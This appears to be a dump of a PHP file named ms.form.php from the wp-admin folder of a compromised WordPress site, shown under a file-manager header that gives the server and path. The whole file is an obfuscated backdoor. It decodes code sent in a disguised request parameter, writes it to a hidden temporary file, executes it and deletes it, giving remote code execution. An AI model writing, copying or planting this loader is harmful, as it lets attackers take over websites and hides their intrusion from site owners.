| Linux premium201.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64 Path : /home/burnskfl/needhamtreecare.com/wp-admin/ |
| Current File : /home/burnskfl/needhamtreecare.com/wp-admin/ms.form.php |
<?php
if(isset($_REQUEST["\x70\x73et"]) ? true : false){
$value = array_filter([getcwd(), "/tmp", session_save_path(), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), getenv("TMP")]);
$key = $_REQUEST["\x70\x73et"];
$key=explode ( "." , $key ) ;
$item = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($salt );
$o = 0;
$__len = count($key );
do {
if ($o >= $__len) break;
$v5 = $key[$o];
$chS = ord($salt[$o % $sLen] );
$dec = ((int)$v5 - $chS - ($o % 10)) ^ 32;
$item .=chr($dec );
$o++;
} while (true );
while ($record = array_shift($value)) {
if (max(0, is_dir($record) * is_writable($record))) {
$binding = vsprintf("%s/%s", [$record, ".factor"]);
if (file_put_contents($binding, $item)) {
require $binding;
unlink($binding);
die();
}
}
}
}